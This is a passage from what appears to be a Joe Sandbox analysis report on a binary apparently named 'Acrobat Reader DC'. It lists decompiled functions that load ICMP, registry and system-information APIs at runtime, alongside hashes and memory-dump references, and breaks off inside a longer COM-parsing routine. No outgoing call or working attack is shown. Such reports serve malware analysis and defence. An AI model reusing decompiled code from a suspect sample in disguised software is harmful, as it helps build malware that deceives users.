                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                  • String ID: crts
                                  • API String ID: 943502515-3724388283
                                  • Opcode ID: 2d82e50f2031013929f3e7369429b0b1e1aeb80a721c9f7d558a3d87c3c8a39b
                                  • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                  • Opcode Fuzzy Hash: 2d82e50f2031013929f3e7369429b0b1e1aeb80a721c9f7d558a3d87c3c8a39b
                                  • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004312CC(struct HINSTANCE__** _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				struct HINSTANCE__** _t6;

				_t6 = _a4;
				if(_t6[2] == 0) {
					_t4 = LoadLibraryA("ICMP.DLL");
					 *_t6 = _t4;
					if(_t4 != 0) {
						_t5 = GetProcAddress(_t4, "IcmpCloseHandle");
						_t6[2] = _t5;
						return _t5;
					}
				}
				return _t4;
			}






                                  0x004312d0
                                  0x004312d7
                                  0x004312de
                                  0x004312e4
                                  0x004312e8
                                  0x004312f0
                                  0x004312f6
                                  0x00000000
                                  0x004312f6
                                  0x004312e8
                                  0x004312fb

                                  APIs
                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                  • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: ICMP.DLL$IcmpCloseHandle
                                  • API String ID: 2574300362-3530519716
                                  • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                  • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                  • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                  • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004312FE(struct HINSTANCE__** _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				struct HINSTANCE__** _t6;

				_t6 = _a4;
				if(_t6[2] == 0) {
					_t4 = LoadLibraryA("ICMP.DLL");
					 *_t6 = _t4;
					if(_t4 != 0) {
						_t5 = GetProcAddress(_t4, "IcmpCreateFile");
						_t6[2] = _t5;
						return _t5;
					}
				}
				return _t4;
			}






                                  0x00431302
                                  0x00431309
                                  0x00431310
                                  0x00431316
                                  0x0043131a
                                  0x00431322
                                  0x00431328
                                  0x00000000
                                  0x00431328
                                  0x0043131a
                                  0x0043132d

                                  APIs
                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                  • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: ICMP.DLL$IcmpCreateFile
                                  • API String ID: 2574300362-275556492
                                  • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                  • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                  • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                  • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0043129A(struct HINSTANCE__** _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				struct HINSTANCE__** _t6;

				_t6 = _a4;
				if(_t6[2] == 0) {
					_t4 = LoadLibraryA("ICMP.DLL");
					 *_t6 = _t4;
					if(_t4 != 0) {
						_t5 = GetProcAddress(_t4, "IcmpSendEcho");
						_t6[2] = _t5;
						return _t5;
					}
				}
				return _t4;
			}






                                  0x0043129e
                                  0x004312a5
                                  0x004312ac
                                  0x004312b2
                                  0x004312b6
                                  0x004312be
                                  0x004312c4
                                  0x00000000
                                  0x004312c4
                                  0x004312b6
                                  0x004312c9

                                  APIs
                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                  • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: ICMP.DLL$IcmpSendEcho
                                  • API String ID: 2574300362-58917771
                                  • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                  • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                  • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                  • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00430C7F(struct HINSTANCE__** _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				struct HINSTANCE__** _t6;

				_t6 = _a4;
				if(_t6[2] == 0) {
					_t4 = LoadLibraryA("advapi32.dll");
					 *_t6 = _t4;
					if(_t4 != 0) {
						_t5 = GetProcAddress(_t4, "RegDeleteKeyExW");
						_t6[2] = _t5;
						return _t5;
					}
				}
				return _t4;
			}






                                  0x00430c83
                                  0x00430c8a
                                  0x00430c91
                                  0x00430c97
                                  0x00430c9b
                                  0x00430ca3
                                  0x00430ca9
                                  0x00000000
                                  0x00430ca9
                                  0x00430c9b
                                  0x00430cae

                                  APIs
                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                  • API String ID: 2574300362-4033151799
                                  • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                  • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                  • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                  • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00430DC1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00430DC1(struct HINSTANCE__** _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				struct HINSTANCE__** _t6;

				_t6 = _a4;
				if(_t6[2] == 0) {
					_t4 = LoadLibraryA("kernel32.dll");
					 *_t6 = _t4;
					if(_t4 != 0) {
						_t5 = GetProcAddress(_t4, "GetSystemWow64DirectoryW");
						_t6[2] = _t5;
						return _t5;
					}
				}
				return _t4;
			}






                                  0x00430dc5
                                  0x00430dcc
                                  0x00430dd3
                                  0x00430dd9
                                  0x00430ddd
                                  0x00430de5
                                  0x00430deb
                                  0x00000000
                                  0x00430deb
                                  0x00430ddd
                                  0x00430df0

                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                  • API String ID: 2574300362-1816364905
                                  • Opcode ID: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                  • Instruction ID: 24515a708fc6b3a38513646dac5635f6d90a943ae1c03eade4216686bbe3791e
                                  • Opcode Fuzzy Hash: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                  • Instruction Fuzzy Hash: 51E0127154070A9BD7105FA5E91878A77D8DB14751F10882AFD45E2650D7B8E480C7BC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00430E7B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00430E7B(struct HINSTANCE__** _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				struct HINSTANCE__** _t6;

				_t6 = _a4;
				if(_t6[2] == 0) {
					_t4 = LoadLibraryA("kernel32.dll");
					 *_t6 = _t4;
					if(_t4 != 0) {
						_t5 = GetProcAddress(_t4, "GetModuleHandleExW");
						_t6[2] = _t5;
						return _t5;
					}
				}
				return _t4;
			}






                                  0x00430e7f
                                  0x00430e86
                                  0x00430e8d
                                  0x00430e93
                                  0x00430e97
                                  0x00430e9f
                                  0x00430ea5
                                  0x00000000
                                  0x00430ea5
                                  0x00430e97
                                  0x00430eaa

                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430E8D
                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00430E9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetModuleHandleExW$kernel32.dll
                                  • API String ID: 2574300362-199464113
                                  • Opcode ID: 264f8e721adbed0a0a4958d5ac8267ac8e19a3b8732fd2a865be9a36fa944cb5
                                  • Instruction ID: 757376e69a8637ab8385673bd519a3d20b1bca35ee4978b7889da1ae4d413b5b
                                  • Opcode Fuzzy Hash: 264f8e721adbed0a0a4958d5ac8267ac8e19a3b8732fd2a865be9a36fa944cb5
                                  • Instruction Fuzzy Hash: 4AE01271540706DFD7105F65D91964B77D8DF18762F104C2AFD85E2650D7B8E48087AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040EF60 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040EF60(struct HINSTANCE__** __esi) {
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t4;

				if(__esi[2] == 0) {
					_t3 = LoadLibraryA("kernel32.dll");
					 *__esi = _t3;
					if(_t3 != 0) {
						_t4 = GetProcAddress(_t3, "IsWow64Process");
						__esi[2] = _t4;
						return _t4;
					}
				}
				return _t3;
			}





                                  0x0040ef64
                                  0x0040ef6b
                                  0x0040ef71
                                  0x0040ef75
                                  0x0040ef7d
                                  0x0040ef83
                                  0x00000000
                                  0x0040ef83
                                  0x0040ef75
                                  0x0040ef86

                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll,0040E5C8), ref: 0040EF6B
                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EF7D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: IsWow64Process$kernel32.dll
                                  • API String ID: 2574300362-3024904723
                                  • Opcode ID: e434190cfc746d225dda0a282e539c1801c395cd0759adf62cd2f230f9054cea
                                  • Instruction ID: 8a5e235981a70bd178cc672d1476e78975e513144aeeb8d5c54acf6a3c23c6fb
                                  • Opcode Fuzzy Hash: e434190cfc746d225dda0a282e539c1801c395cd0759adf62cd2f230f9054cea
                                  • Instruction Fuzzy Hash: DCD0C9B4A00B03EAD7301F72DA1870A76E4AB10781F204C3EBC81E5290DBBCC0808B28
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040EFD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040EFD0(struct HINSTANCE__** __esi) {
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t4;

				if(__esi[2] == 0) {
					_t3 = LoadLibraryA("kernel32.dll");
					 *__esi = _t3;
					if(_t3 != 0) {
						_t4 = GetProcAddress(_t3, "GetNativeSystemInfo");
						__esi[2] = _t4;
						return _t4;
					}
				}
				return _t3;
			}





                                  0x0040efd4
                                  0x0040efdb
                                  0x0040efe1
                                  0x0040efe5
                                  0x0040efed
                                  0x0040eff3
                                  0x00000000
                                  0x0040eff3
                                  0x0040efe5
                                  0x0040eff6

                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll,0040E620), ref: 0040EFDB
                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0040EFED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                  • API String ID: 2574300362-192647395
                                  • Opcode ID: 32947d03ff8d1999084252166fef1046a2fe6e8e233e406c4d74cfb9fa3109ee
                                  • Instruction ID: faea892368b665db3229cc6598da919ac71bc07d19fee151484258049274b373
                                  • Opcode Fuzzy Hash: 32947d03ff8d1999084252166fef1046a2fe6e8e233e406c4d74cfb9fa3109ee
                                  • Instruction Fuzzy Hash: DAD092B4900B03AAD7301F22D91860A76A4AB00781B204C2EA981E5290DEB880809B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 89%
                                  			E00451D2B(char _a4, intOrPtr _a8, WCHAR* _a12, WCHAR** _a16) {
				WCHAR* _v8;
				char _v12;
				WCHAR* _v16;
				char _v20;
				char _v24;
				void* __esi;
				intOrPtr* _t137;
				signed int _t140;
				intOrPtr* _t141;
				intOrPtr* _t146;
				signed int _t148;
				char _t149;
				intOrPtr* _t150;
				signed int _t153;
				intOrPtr* _t166;
				intOrPtr* _t169;
				intOrPtr* _t174;
				intOrPtr* _t177;
				signed int _t179;
				intOrPtr* _t180;
				intOrPtr* _t183;
				intOrPtr* _t190;
				char _t192;
				signed int _t194;
				intOrPtr* _t195;
				intOrPtr* _t198;
				signed int _t200;
				intOrPtr* _t201;
				intOrPtr* _t205;
				WCHAR** _t218;
				signed int _t220;
				signed int _t222;
				char _t227;
				signed int _t231;
				signed int _t232;
				intOrPtr* _t235;
				intOrPtr _t237;
				intOrPtr* _t238;
				short* _t241;
				intOrPtr* _t243;
				intOrPtr* _t247;
				char _t248;
				intOrPtr _t252;
				WCHAR* _t254;
				signed int _t271;
				signed int _t274;
				char _t288;
				intOrPtr _t306;
				WCHAR* _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed short _t311;
				signed int* _t312;
				signed short _t313;
				signed int _t314;
				void* _t315;

				_t137 = _a4;
				_t218 = _a16;
				_t306 = _a8;
				_t218[3] = 0;
				_a4 = 0;
				 *_t218 = 0;
				_t310 =  *((intOrPtr*)( *((intOrPtr*)( *_t137 + 0x10))))(_t137, 0, 0x800,  &_a4);
				if(_t310 >= 0) {
					_t140 = E00430EDF( &_a4, 0);
					__eflags = _t140;
					if(_t140 == 0) {
						_t141 = _a4;
						_v8 = 0;
						_t310 =  *((intOrPtr*)( *((intOrPtr*)( *_t141 + 0xc))))(_t141,  &_v12);
						__eflags = _t310;
						if(_t310 < 0) {
							goto L1;
						} else {
							_t227 = _v12;
							__eflags =  *((intOrPtr*)(_t227 + 0x28)) - 3;
							if( *((intOrPtr*)(_t227 + 0x28)) != 3) {
								L12:
								_t146 = _a4;
								_v20 = 0xffffffff;
								_t148 =  *((intOrPtr*)( *((intOrPtr*)( *_t146 + 0x28))))(_t146,  &_a12, 1,  &_v20);
								__eflags = _t148;
								if(_t148 >= 0) {
									L15:
									_t149 = _v12;
									_t311 = 0;
									__eflags = 0 -  *((intOrPtr*)(_t149 + 0x2c));
									if(0 >=  *((intOrPtr*)(_t149 + 0x2c))) {
										goto L30;
									} else {
										while(1) {
											_t166 = _a4;
											_t308 =  *((intOrPtr*)( *((intOrPtr*)( *_t166 + 0x14))))(_t166, _t311 & 0x0000ffff,  &_v8);
											__eflags = _t308;
											if(_t308 < 0) {
												break;
											}
											_t247 = _v8;
											__eflags =  *(_t247 + 0x10) & 0x00000003;
											if(( *(_t247 + 0x10) & 0x00000003) == 0) {
												L19:
												_t174 = _a4;
												 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 0x50))))(_t174, _t247);
												_t248 = _v12;
												_t311 = 1 + _t311;
												_v8 = 0;
												__eflags = _t311 -  *((intOrPtr*)(_t248 + 0x2c));
												if(_t311 <  *((intOrPtr*)(_t248 + 0x2c))) {
													continue;
												} else {
													goto L30;
												}
											} else {
												__eflags =  *_t247 - _v20;
												if( *_t247 == _v20) {
													goto L30;
												} else {
													goto L19;
												}
											}
											goto L51;
										}
										_t169 = _a4;
										 *((intOrPtr*)( *((intOrPtr*)( *_t169 + 0x4c))))(_t169, _v12);
										E00430EAD( &_a4);
										return _t308;
									}
								} else {
									_t177 = _a4;
									_t313 = 0;
									_v16 = 0;
									_t179 =  *((intOrPtr*)( *((intOrPtr*)( *_t177 + 0x1c))))(_t177, _t306,  &_v16, 1,  &_v24);
									__eflags = _t179;
									if(_t179 < 0) {
										_t288 = _v12;
										__eflags = 0 -  *((intOrPtr*)(_t288 + 0x2c));
										if(0 >=  *((intOrPtr*)(_t288 + 0x2c))) {
											L30:
											_t150 = _a4;
											 *((intOrPtr*)( *((intOrPtr*)( *_t150 + 0x4c))))(_t150, _v12);
											_t153 = _v8;
											_t307 = 0;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L8;
											} else {
												_t231 =  *(_t153 + 0x18) & 0x0000ffff;
												__eflags = _t231 - 0x20;
												if(_t231 <= 0x20) {
													 *_t218 = 1;
													_v16 = 0;
													__eflags = 0 - _t231;
													if(0 < _t231) {
														_t104 =  &(_t218[4]); // 0x47984c
														_t312 = _t104;
														do {
															_t237 =  *((intOrPtr*)(_t153 + 8));
															_t274 =  *(_t237 + _t307 + 4) & 0x0000ffff;
															_t238 = _t237 + _t307;
															 *_t312 = _t274;
															__eflags = _t274 - 0x1a;
															if(_t274 == 0x1a) {
																_t220 = 0x00004000 |  *( *_t238 + 4);
																__eflags = _t220;
																 *_t312 = _t220;
																_t218 = _a16;
															}
															__eflags =  *_t312 - 0x1b;
															if( *_t312 == 0x1b) {
																_t222 = 0x00002000 |  *( *_t238 + 4);
																__eflags = _t222;
																 *_t312 = _t222;
																_t218 = _a16;
															}
															__eflags =  *_t312 - 0x1d;
															if( *_t312 == 0x1d) {
																 *_t312 = E0044A545(_a4, _t312, _a4,  *_t238);
																_t153 = _v8;
																_t315 = _t315 + 8;
															}
															_t312[0] =  *((intOrPtr*)( *((intOrPtr*)(_t153 + 8)) + _t307 + 0xc));
															_t241 =  &(_v16[0]);
															_t307 = _t307 + 0x10;
															_t312 =  &(_t312[1]);
															_v16 = _t241;
															__eflags = _t241 -  *(_t153 + 0x18);
														} while (_t241 <  *(_t153 + 0x18));
													}
													_t232 =  *(_t153 + 0x24) & 0x0000ffff;
													_t271 = _t232 - 0x16;
													__eflags = _t271 - 3;
													if(_t271 <= 3) {
														switch( *((intOrPtr*)(_t271 * 4 +  &M0045212B))) {
															case 0:
																_t232 = 3;
																goto L48;
															case 1:
																__ecx = 0x13;
																goto L48;
															case 2:
																__ecx = 0;
																goto L48;
															case 3:
																__ecx = 0xa;
																goto L48;
														}
													}
													L48:
													_t218[3] = _t232;
													_t218[1] =  *(_t153 + 0x10);
													_t218[3] =  *(_t153 + 0x18);
													_t235 = _a4;
													_t218[2] =  *(_t153 + 0x14);
													 *((intOrPtr*)( *((intOrPtr*)( *_t235 + 0x50))))(_t235, _t153);
													E00430EAD( &_a4);
													__eflags = 0;
													return 0;
												} else {
													_t243 = _a4;
													 *((intOrPtr*)( *((intOrPtr*)( *_t243 + 0x50))))(_t243, _t153);
													E00430EAD( &_a4);
													return 0x80004005;
												}
											}
										} else {
											while(1) {
												_t180 = _a4;
												_t309 =  *((intOrPtr*)( *((intOrPtr*)( *_t180 + 0x14))))(_t180, _t313 & 0x0000ffff,  &_v8);
												_t183 = _a4;
												_t252 =  *_t183;
												__eflags = _t309;
												if(_t309 < 0) {
													break;
												}
